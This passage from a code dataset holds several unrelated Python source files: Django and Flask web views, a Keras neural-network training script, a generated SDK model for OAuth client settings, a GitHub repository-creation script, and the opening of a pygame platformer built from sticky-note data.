messages.error(request, 'Failed to update profile!')\n\n user_details = User.objects.select_related(\"customer\").get(username=request.user)\n customer_form = UpdateCustomerForm(instance=request.user.customer)\n user_form = UpdateUserForm(instance=request.user)\n\n context = {\n 'user_details': user_details,\n 'customer_form': customer_form,\n 'user_form': user_form\n }\n\n return render(request, 
'registration/profile.html', context)\n\n\n\n\n","sub_path":"store/views/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151708009","text":"import threading\n\nfrom flask_restful import Resource, request, current_app\nfrom schematics.exceptions import DataError\n\nfrom server.models.dtos.message_dto import MessageDTO\nfrom server.services.messaging.message_service import MessageService, NotFound, MessageServiceError\nfrom server.services.users.authentication_service import token_auth, tm\n\n\nclass ProjectsMessageAll(Resource):\n\n @tm.pm_only()\n @token_auth.login_required\n def post(self, project_id):\n \"\"\"\n Send message to all contributors to a project\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: project_id\n in: path\n description: The unique project ID\n required: true\n type: integer\n default: 1\n - in: body\n name: body\n required: true\n description: JSON object for creating draft project\n schema:\n properties:\n subject:\n type: string\n default: Thanks\n required: true\n message:\n type: string\n default: Thanks for your contribution\n required: true\n responses:\n 200:\n description: All mapped tasks validated\n 401:\n description: Unauthorized - Invalid credentials\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n message_dto = MessageDTO(request.get_json())\n message_dto.from_user_id = tm.authenticated_user_id\n message_dto.validate()\n except DataError as e:\n current_app.logger.error(f'Error validating request: {str(e)}')\n return str(e), 400\n\n try:\n threading.Thread(target=MessageService.send_message_to_all_contributors,\n args=(project_id, message_dto)).start()\n\n return {\"Success\": \"Messages started\"}, 200\n except Exception as e:\n error_msg = f'Send message all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass HasNewMessages(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self):\n \"\"\"\n Gets count of unread messages\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Message info\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n unread_messages = MessageService.has_user_new_messages(tm.authenticated_user_id)\n return unread_messages, 200\n except Exception as e:\n error_msg = f'User GET - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass GetAllMessages(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self):\n \"\"\"\n Get all messages for logged in user\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Messages found\n 404:\n description: User has no messages\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n user_messages = MessageService.get_all_messages(tm.authenticated_user_id)\n return 
user_messages.to_primitive(), 200\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass MessagesAPI(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def get(self, message_id):\n \"\"\"\n Gets the specified message\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: message_id\n in: path\n description: The unique message\n required: true\n type: integer\n default: 1\n responses:\n 200:\n description: Messages found\n 403:\n description: Forbidden, if user attempting to ready other messages\n 404:\n description: Not found\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n user_message = MessageService.get_message_as_dto(message_id, tm.authenticated_user_id)\n return user_message.to_primitive(), 200\n except MessageServiceError as e:\n return {\"Error\": str(e)}, 403\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n @tm.pm_only(False)\n @token_auth.login_required\n def delete(self, message_id):\n \"\"\"\n Deletes the specified message\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n - name: message_id\n in: path\n description: The unique message\n required: true\n type: integer\n default: 1\n responses:\n 200:\n description: Messages found\n 403:\n description: Forbidden, if user attempting to ready other messages\n 404:\n description: Not found\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n MessageService.delete_message(message_id, tm.authenticated_user_id)\n return {\"Success\": \"Message deleted\"}, 200\n except MessageServiceError as e:\n return {\"Error\": str(e)}, 403\n except NotFound:\n return {\"Error\": \"No messages found\"}, 404\n except Exception as e:\n error_msg = f'Messages GET all - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n\n\nclass ResendEmailValidationAPI(Resource):\n\n @tm.pm_only(False)\n @token_auth.login_required\n def post(self):\n \"\"\"\n Resends the validation user to the logged in user\n ---\n tags:\n - messaging\n produces:\n - application/json\n parameters:\n - in: header\n name: Authorization\n description: Base64 encoded session token\n required: true\n type: string\n default: Token sessionTokenHere==\n responses:\n 200:\n description: Resends the user their email verification email\n 500:\n description: Internal Server Error\n \"\"\"\n try:\n MessageService.resend_email_validation(tm.authenticated_user_id)\n return {\"Success\": \"Verification email resent\"}, 200\n except Exception as e:\n error_msg = f'User GET - unhandled error: {str(e)}'\n current_app.logger.critical(error_msg)\n return {\"error\": error_msg}, 500\n","sub_path":"server/api/messaging/message_apis.py","file_name":"message_apis.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"377169907","text":"# Most of the comments can be removed\n# Libraries should all be imported at the top\n# File is written to learn about the process rather than to be a finished product\n\n# Importing the libraries\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nnp.set_printoptions(threshold=np.inf)\nK = 4\n# np.random.seed(12345) in theory this should make the ANN process repeatable but does not for me\n\n# Importing the dataset & encoding categorical data\ndef load_data():\n dataset = pd.read_csv('~/Deep Learning A-Z/Deep Learning A-Z course/part_1_ANNs/my_implementation/original_input.csv')\n dataset = dataset.drop(columns=[\"RowNumber\", \"CustomerId\", \"Surname\"])\n dataset['Gender'] = dataset['Gender'].replace({'Female': 1, 'Male': 0}) # this is a more specific and naive version of the course's abstraction\n dataset['Country_A'] = dataset.apply(lambda row: 1 if row.Geography == \"France\" else 0, axis=1)\n dataset['Country_B'] = dataset.apply(lambda row: 1 if row.Geography == \"Spain\" else 0, axis=1)\n dataset = dataset.drop(columns=\"Geography\")\n ex = dataset.iloc[:, list(range(9)) + list(range(10,12))].values\n why = dataset.iloc[:, 9].values\n return ex, why\n\n# Plan for next:\n# functionise it\n# separate into test and train before the stratified step - can do cross-validation within the train\nfrom sklearn.model_selection import train_test_split\ndef split_out_test_set(X, y, K):\n return train_test_split(X, y, test_size = 1/(K+1), random_state = 123)\n\nfrom sklearn.model_selection import StratifiedKFold\ndef kfolding_for_cross_validation():\n skf = StratifiedKFold(n_splits=K, random_state=123)\n return skf\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\ndef feature_scale(trainx, testx):\n sc = StandardScaler()\n X_train = sc.fit_transform(trainx) # this saves the values of the mean and standard deviation from the training set - these are then applied to the test set:\n X_test = sc.transform(testx)\n #homework_test = np.array([600, 0, 40, 3, 60000, 2, 1, 1, 50000, 1, 0])\n #homework = sc.transform(homework_test.reshape(1,-1))\n return X_train, X_test #, homework\n\n# Fitting classifier to the Training set\n# Create your classifier here\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\ndef create_ANN_model(optimizer='adam'):\n classifier = Sequential()\n classifier.add(Dense(activation='relu', input_dim=11, units=6, kernel_initializer='uniform')) # Tip is to use the average of input and output number of nodes as the first hidden layer number of nodes\n classifier.add(Dropout(rate=0.1))\n classifier.add(Dense(activation='relu', units=6, kernel_initializer='uniform'))\n classifier.add(Dropout(rate=0.1))\n classifier.add(Dense(activation='sigmoid', units=1, kernel_initializer='uniform')) # if there were multiple outputs then would need to use softmax instead of sigmoid\n classifier.compile(optimizer, loss='binary_crossentropy', metrics=['accuracy']) # categorical_crossentropy if more than two categories\n return classifier\n\ndef train_and_evaluate_model(model, X_train, y_train, X_test, y_test, return_model=0, batch_size=10, epochs=20):\n model.fit(X_train, y_train, batch_size, epochs)\n y_hat = 0\n y_hat = model.predict(X_test)\n y_hat = np.rint(y_hat)\n correct_predictions = 0\n incorrect_predictions = 0\n for index, value in enumerate(y_hat):\n if value == y_test[index]:\n correct_predictions += 1\n else:\n incorrect_predictions 
+=1\n accuracy = 0\n accuracy = correct_predictions/(correct_predictions+incorrect_predictions)\n print(str(100*accuracy) + \"% accuracy\")\n if return_model:\n return accuracy, model\n else:\n return accuracy\n\nfrom sklearn.metrics import confusion_matrix\n\n\ndef run_model(batch_size=10, epochs=20, optimizer='adam'):\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # because this is running faster on just CPU\n os.environ['TF_CPP_MIN_LOG_LEVEL']='3'\n X, y = load_data()\n X_train_validate, X_test, y_train_validate, y_test = split_out_test_set(X, y, 4)\n X_train_validate, X_test = feature_scale(X_train_validate, X_test)\n\n accuracies = []\n for train, test in kfolding_for_cross_validation().split(X_train_validate, y_train_validate):\n model = None\n model = create_ANN_model(optimizer)\n accuracy = train_and_evaluate_model(model, X_train_validate[train], y_train_validate[train], X_train_validate[test], y_train_validate[test], 0, batch_size, epochs)\n accuracies.append(accuracy)\n standard_deviation = np.std(accuracies)\n # return np.mean(accuracies)\n\n\n model = None\n model = create_ANN_model(optimizer)\n trained_model_accuracy, trained_model = train_and_evaluate_model(model ,X_train_validate, y_train_validate, X_test, y_test, 1, batch_size, epochs)\n print(trained_model_accuracy)\n y_pred = trained_model.predict(X_test)\n y_pred = (y_pred > 0.5)\n cm = confusion_matrix(y_test, y_pred)\n\n\ndef grid_search():\n parameters = { 'batch_size': [1, 10, 24, 32, 50],\n 'epochs': [50, 200, 500],\n 'optimizer': ['adam', 'rmsprop'] }\n current_best_accuracy = 0\n current_best_parameter_set = ''\n for x in parameters['batch_size']:\n for y in parameters['epochs']:\n for z in parameters['optimizer']:\n new_accuracy = run_model(x, y, z)\n if new_accuracy > current_best_accuracy:\n current_best_accuracy = new_accuracy\n current_best_parameter_set = (str(x) + str(y) + z)\n print(current_best_accuracy)\n print(current_best_parameter_set)\n\n# output from grid search:\n# 0.8421207932176983\n# 32500adam\n\nif __name__ == \"__main__\":\n run_model(32, 500, 'adam')","sub_path":"part_1_ANNs/my_implementation/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"165133057","text":"# coding: utf-8\n\n\"\"\"\n Idfy.Admin\n\n In this API you can manage your account details, logo, styling or manage your openid / oauth api clients. If you are a dealer you can also manage the accounts registered to this dealer. 
## Last update Last build date for this API: 14.01.2018 \n\n\"\"\"\n\n\nimport pprint\nimport re\nfrom typing import List, Dict\nfrom datetime import datetime as datetime\n\n\nfrom idfy_sdk.services.admin.models.oauth_secret import OauthSecret\n\nclass CreateOauthAPIClientRequest(object):\n \"\"\"NOTE: This class is generated by Eivind.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'account_id': str,\n 'client_name': str,\n 'client_secrets': List[OauthSecret],\n 'allowed_scopes': List[str],\n 'identity_token_lifetime': int,\n 'access_token_lifetime': int,\n 'absolute_refresh_token_lifetime': int,\n 'sliding_refresh_token_lifetime': int,\n 'refresh_token_usage': str,\n 'update_access_token_claims_on_refresh': bool,\n 'refresh_token_expiration': str,\n 'access_token_type': str,\n 'always_send_client_claims': bool,\n 'allowed_cors_origins': List[str]\n }\n\n attribute_map = {\n 'account_id': 'AccountId',\n 'client_name': 'ClientName',\n 'client_secrets': 'ClientSecrets',\n 'allowed_scopes': 'AllowedScopes',\n 'identity_token_lifetime': 'IdentityTokenLifetime',\n 'access_token_lifetime': 'AccessTokenLifetime',\n 'absolute_refresh_token_lifetime': 'AbsoluteRefreshTokenLifetime',\n 'sliding_refresh_token_lifetime': 'SlidingRefreshTokenLifetime',\n 'refresh_token_usage': 'RefreshTokenUsage',\n 'update_access_token_claims_on_refresh': 'UpdateAccessTokenClaimsOnRefresh',\n 'refresh_token_expiration': 'RefreshTokenExpiration',\n 'access_token_type': 'AccessTokenType',\n 'always_send_client_claims': 'AlwaysSendClientClaims',\n 'allowed_cors_origins': 'AllowedCorsOrigins'\n }\n\n def __init__(self, account_id=None, client_name=None, client_secrets=None, allowed_scopes=None, identity_token_lifetime=None, access_token_lifetime=None, absolute_refresh_token_lifetime=None, sliding_refresh_token_lifetime=None, refresh_token_usage=None, update_access_token_claims_on_refresh=None, refresh_token_expiration=None, access_token_type=None, always_send_client_claims=None, allowed_cors_origins=None):\n\n self._account_id = None\n self._client_name = None\n self._client_secrets = None\n self._allowed_scopes = None\n self._identity_token_lifetime = None\n self._access_token_lifetime = None\n self._absolute_refresh_token_lifetime = None\n self._sliding_refresh_token_lifetime = None\n self._refresh_token_usage = None\n self._update_access_token_claims_on_refresh = None\n self._refresh_token_expiration = None\n self._access_token_type = None\n self._always_send_client_claims = None\n self._allowed_cors_origins = None\n self.discriminator = None\n\n if account_id is not None:\n self.account_id = account_id\n if client_name is not None:\n self.client_name = client_name\n if client_secrets is not None:\n self.client_secrets = client_secrets\n if allowed_scopes is not None:\n self.allowed_scopes = allowed_scopes\n if identity_token_lifetime is not None:\n self.identity_token_lifetime = identity_token_lifetime\n if access_token_lifetime is not None:\n self.access_token_lifetime = access_token_lifetime\n if absolute_refresh_token_lifetime is not None:\n self.absolute_refresh_token_lifetime = absolute_refresh_token_lifetime\n if sliding_refresh_token_lifetime is not None:\n self.sliding_refresh_token_lifetime = sliding_refresh_token_lifetime\n if refresh_token_usage is not None:\n 
self.refresh_token_usage = refresh_token_usage\n if update_access_token_claims_on_refresh is not None:\n self.update_access_token_claims_on_refresh = update_access_token_claims_on_refresh\n if refresh_token_expiration is not None:\n self.refresh_token_expiration = refresh_token_expiration\n if access_token_type is not None:\n self.access_token_type = access_token_type\n if always_send_client_claims is not None:\n self.always_send_client_claims = always_send_client_claims\n if allowed_cors_origins is not None:\n self.allowed_cors_origins = allowed_cors_origins\n\n @property\n def account_id(self):\n \"\"\"Gets the account_id of this CreateOauthAPIClientRequest.\n\n\n :return: The account_id of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._account_id\n\n @account_id.setter\n def account_id(self, account_id):\n \"\"\"Sets the account_id of this CreateOauthAPIClientRequest.\n\n\n :param account_id: The account_id of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._account_id = account_id\n\n @property\n def client_name(self):\n \"\"\"Gets the client_name of this CreateOauthAPIClientRequest.\n\n\n :return: The client_name of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._client_name\n\n @client_name.setter\n def client_name(self, client_name):\n \"\"\"Sets the client_name of this CreateOauthAPIClientRequest.\n\n\n :param client_name: The client_name of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._client_name = client_name\n\n @property\n def client_secrets(self):\n \"\"\"Gets the client_secrets of this CreateOauthAPIClientRequest.\n\n\n :return: The client_secrets of this CreateOauthAPIClientRequest.\n :rtype: List[OauthSecret]\n \"\"\"\n return self._client_secrets\n\n @client_secrets.setter\n def client_secrets(self, client_secrets):\n \"\"\"Sets the client_secrets of this CreateOauthAPIClientRequest.\n\n\n :param client_secrets: The client_secrets of this CreateOauthAPIClientRequest.\n :type: List[OauthSecret]\n \"\"\"\n\n self._client_secrets = client_secrets\n\n @property\n def allowed_scopes(self):\n \"\"\"Gets the allowed_scopes of this CreateOauthAPIClientRequest.\n\n\n :return: The allowed_scopes of this CreateOauthAPIClientRequest.\n :rtype: List[str]\n \"\"\"\n return self._allowed_scopes\n\n @allowed_scopes.setter\n def allowed_scopes(self, allowed_scopes):\n \"\"\"Sets the allowed_scopes of this CreateOauthAPIClientRequest.\n\n\n :param allowed_scopes: The allowed_scopes of this CreateOauthAPIClientRequest.\n :type: List[str]\n \"\"\"\n\n self._allowed_scopes = allowed_scopes\n\n @property\n def identity_token_lifetime(self):\n \"\"\"Gets the identity_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of identity token in seconds (defaults to 300 seconds / 5 minutes)\n\n :return: The identity_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._identity_token_lifetime\n\n @identity_token_lifetime.setter\n def identity_token_lifetime(self, identity_token_lifetime):\n \"\"\"Sets the identity_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of identity token in seconds (defaults to 300 seconds / 5 minutes)\n\n :param identity_token_lifetime: The identity_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._identity_token_lifetime = identity_token_lifetime\n\n @property\n def access_token_lifetime(self):\n \"\"\"Gets the access_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of access 
token in seconds (defaults to 3600 seconds / 1 hour)\n\n :return: The access_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._access_token_lifetime\n\n @access_token_lifetime.setter\n def access_token_lifetime(self, access_token_lifetime):\n \"\"\"Sets the access_token_lifetime of this CreateOauthAPIClientRequest.\n\n Lifetime of access token in seconds (defaults to 3600 seconds / 1 hour)\n\n :param access_token_lifetime: The access_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._access_token_lifetime = access_token_lifetime\n\n @property\n def absolute_refresh_token_lifetime(self):\n \"\"\"Gets the absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Maximum lifetime of a refresh token in seconds. Defaults to 2592000 seconds / 30 days\n\n :return: The absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._absolute_refresh_token_lifetime\n\n @absolute_refresh_token_lifetime.setter\n def absolute_refresh_token_lifetime(self, absolute_refresh_token_lifetime):\n \"\"\"Sets the absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Maximum lifetime of a refresh token in seconds. Defaults to 2592000 seconds / 30 days\n\n :param absolute_refresh_token_lifetime: The absolute_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._absolute_refresh_token_lifetime = absolute_refresh_token_lifetime\n\n @property\n def sliding_refresh_token_lifetime(self):\n \"\"\"Gets the sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Sliding lifetime of a refresh token in seconds. Defaults to 1296000 seconds / 15 days\n\n :return: The sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :rtype: int\n \"\"\"\n return self._sliding_refresh_token_lifetime\n\n @sliding_refresh_token_lifetime.setter\n def sliding_refresh_token_lifetime(self, sliding_refresh_token_lifetime):\n \"\"\"Sets the sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n\n Sliding lifetime of a refresh token in seconds. 
Defaults to 1296000 seconds / 15 days\n\n :param sliding_refresh_token_lifetime: The sliding_refresh_token_lifetime of this CreateOauthAPIClientRequest.\n :type: int\n \"\"\"\n\n self._sliding_refresh_token_lifetime = sliding_refresh_token_lifetime\n\n @property\n def refresh_token_usage(self):\n \"\"\"Gets the refresh_token_usage of this CreateOauthAPIClientRequest.\n\n\n :return: The refresh_token_usage of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._refresh_token_usage\n\n @refresh_token_usage.setter\n def refresh_token_usage(self, refresh_token_usage):\n \"\"\"Sets the refresh_token_usage of this CreateOauthAPIClientRequest.\n\n\n :param refresh_token_usage: The refresh_token_usage of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._refresh_token_usage = refresh_token_usage\n\n @property\n def update_access_token_claims_on_refresh(self):\n \"\"\"Gets the update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether the access token (and its claims) should be updated on a refresh token request.\n\n :return: The update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n :rtype: bool\n \"\"\"\n return self._update_access_token_claims_on_refresh\n\n @update_access_token_claims_on_refresh.setter\n def update_access_token_claims_on_refresh(self, update_access_token_claims_on_refresh):\n \"\"\"Sets the update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether the access token (and its claims) should be updated on a refresh token request.\n\n :param update_access_token_claims_on_refresh: The update_access_token_claims_on_refresh of this CreateOauthAPIClientRequest.\n :type: bool\n \"\"\"\n\n self._update_access_token_claims_on_refresh = update_access_token_claims_on_refresh\n\n @property\n def refresh_token_expiration(self):\n \"\"\"Gets the refresh_token_expiration of this CreateOauthAPIClientRequest.\n\n\n :return: The refresh_token_expiration of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._refresh_token_expiration\n\n @refresh_token_expiration.setter\n def refresh_token_expiration(self, refresh_token_expiration):\n \"\"\"Sets the refresh_token_expiration of this CreateOauthAPIClientRequest.\n\n\n :param refresh_token_expiration: The refresh_token_expiration of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._refresh_token_expiration = refresh_token_expiration\n\n @property\n def access_token_type(self):\n \"\"\"Gets the access_token_type of this CreateOauthAPIClientRequest.\n\n\n :return: The access_token_type of this CreateOauthAPIClientRequest.\n :rtype: str\n \"\"\"\n return self._access_token_type\n\n @access_token_type.setter\n def access_token_type(self, access_token_type):\n \"\"\"Sets the access_token_type of this CreateOauthAPIClientRequest.\n\n\n :param access_token_type: The access_token_type of this CreateOauthAPIClientRequest.\n :type: str\n \"\"\"\n\n self._access_token_type = access_token_type\n\n @property\n def always_send_client_claims(self):\n \"\"\"Gets the always_send_client_claims of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether client claims should be always included in the access tokens - or only for client credentials flow.\n\n :return: The always_send_client_claims of this CreateOauthAPIClientRequest.\n :rtype: bool\n \"\"\"\n return self._always_send_client_claims\n\n @always_send_client_claims.setter\n def 
always_send_client_claims(self, always_send_client_claims):\n \"\"\"Sets the always_send_client_claims of this CreateOauthAPIClientRequest.\n\n Gets or sets a value indicating whether client claims should be always included in the access tokens - or only for client credentials flow.\n\n :param always_send_client_claims: The always_send_client_claims of this CreateOauthAPIClientRequest.\n :type: bool\n \"\"\"\n\n self._always_send_client_claims = always_send_client_claims\n\n @property\n def allowed_cors_origins(self):\n \"\"\"Gets the allowed_cors_origins of this CreateOauthAPIClientRequest.\n\n\n :return: The allowed_cors_origins of this CreateOauthAPIClientRequest.\n :rtype: List[str]\n \"\"\"\n return self._allowed_cors_origins\n\n @allowed_cors_origins.setter\n def allowed_cors_origins(self, allowed_cors_origins):\n \"\"\"Sets the allowed_cors_origins of this CreateOauthAPIClientRequest.\n\n\n :param allowed_cors_origins: The allowed_cors_origins of this CreateOauthAPIClientRequest.\n :type: List[str]\n \"\"\"\n\n self._allowed_cors_origins = allowed_cors_origins\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in self.swagger_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CreateOauthAPIClientRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"idfy_sdk/services/admin/models/create_oauth_api_client_request.py","file_name":"create_oauth_api_client_request.py","file_ext":"py","file_size_in_byte":16779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44313453","text":"#!/usr/bin/env python3\nimport requests\nfrom pprint import pprint\nfrom secrets import GITHUB_TOKEN, REPO_PATH, GITHUB_USER\nimport argparse\nimport os\n\n#Parsing arguments -> Name of the repository, Visibility of the repository (Private/Public)\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", \"-n\", type=str, dest=\"name\", required=True)\nparser.add_argument(\"--private\", \"-p\", dest=\"is_private\", action=\"store_true\")\n\nargs = parser.parse_args()\n\nrepo_name = args.name\nis_private = args.is_private\n\n#Creating the repo based on received arguments\nAPI_URL = \"https://api.github.com\"\n#GITHUB_TOKEN = \n#REPO_PATH = \n#GITHUB_USER= \n\nif is_private:\n payload = '{\"name\":\"' + repo_name + '\", \"private\": true}'\nelse:\n payload = '{\"name\":\"' + repo_name + '\", \"private\": false}'\n\nheaders = {\n \"Authorization\" : \"token \" + GITHUB_TOKEN,\n \"Accept\": \"application/vnd.github.v3+json\"\n}\ntry:\n r = requests.post(API_URL+\"/user/repos\",data=payload,headers=headers)\n r.raise_for_status()\n 
#pprint(r.json())\nexcept requests.exceptions.RequestException as err:\n raise SystemExit(err)\n\n# Adding README to the Repo and creating a local clone + Linking local repo and remote repo.\ntry:\n os.chdir(REPO_PATH)\n os.system(\"mkdir \" + repo_name)\n os.chdir(REPO_PATH + repo_name)\n os.system(\"git init\")\n os.system(\"git remote add origin https://github.com/\" + GITHUB_USER + \"/\" + repo_name + \".git\")\n os.system(\"git branch -M main\")\n os.system(\"echo '# \" + repo_name + \"' >> README.md\")\n os.system(\"git add . && git commit -m 'Initial Commit' && git push origin main\")\nexcept FileExistsError as err:\n raise SystemExit(err)","sub_path":"createRepo.py","file_name":"createRepo.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96317333","text":"from django import forms\nfrom refrigerator.models import *\n\n\n#recipe_checkbox\nclass RecipeForm(forms.Form):\n def __init__(self, user, foods=[], *args, **kwargs):\n super(RecipeForm, self).__init__(*args,**kwargs)\n self.fields['foods'] = forms.MultipleChoiceField(\n label = \"\",\n choices = [(item.id,item.foodset) for item in foods],\n widget = forms.CheckboxSelectMultiple(),\n initial = 0\n )","sub_path":"syokuzai_tarou/recipe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106912517","text":"\"\"\"\nFlagship file for the StickyJump platformer game\nProprietary content of StickyAR, 2019\nBrought to you by Luke Igel, Fischer Moseley, Tim Gutterman, and Zach Rolfness\n\"\"\"\nimport pygame as pg\nimport time\nimport random\nfrom settings import *\nfrom stickys import updateSticky, clearSticky, calibrate, uncalibrate\n\nfrom sprites import *\nfrom time import sleep\n\n# Default data seeds a guaranteed game world in absence of CV data\nDEFAULT_CV = [(150,200,50,50,\"blue\"), (275,200,50,50,\"orange\"), (375,200,50,50,\"green\"), (450,200,50,50,\"pink\")]\n\nclass StickyJump:\n def __init__(self, cv_data, debug_mode):\n self.debug_mode = debug_mode\n # Check if CV data pipeline is operational, and use default data if not\n if cv_data is None:\n self.cv_data = DEFAULT_CV\n else:\n self.cv_data = cv_data\n # Add the invisible killing floor to bottom of game window\n self.cv_data.append((0, 768, 2048, 5,\"pink\"))\n \n # Initialize game window\n pg.init()\n pg.mixer.init()\n if debug_mode:\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n else:\n self.screen = pg.display.set_mode((WIDTH, HEIGHT),flags=pg.FULLSCREEN)\n pg.display.set_caption(TITLE)\n \n #Basic procedural game settings\n self.clock = pg.time.Clock()\n self.running = True\n self.xspawn = 0\n self.yspawn = 0\n self.win_state = False\n\n def read_cv_data(self):\n \"\"\"Reads incoming CV data from the projected visual field and adds colored platforms as game sprites\"\"\"\n print(self.cv_data)\n \n for sticky in self.cv_data:\n # Get the sticky note's (x, y) position, width, and height, respectively\n plat = sticky[:-1]\n print(\"PLAT\")\n print(*plat)\n\n sticky_color = sticky[-1]\n # Different types of platforms correspond to different sticky note colors\n if sticky_color == \"green\":\n p = WinSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n self.winplatform.add(p)\n \n elif sticky_color == \"blue\":\n p = WalkSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n \n # Orange sticky is the spawn 
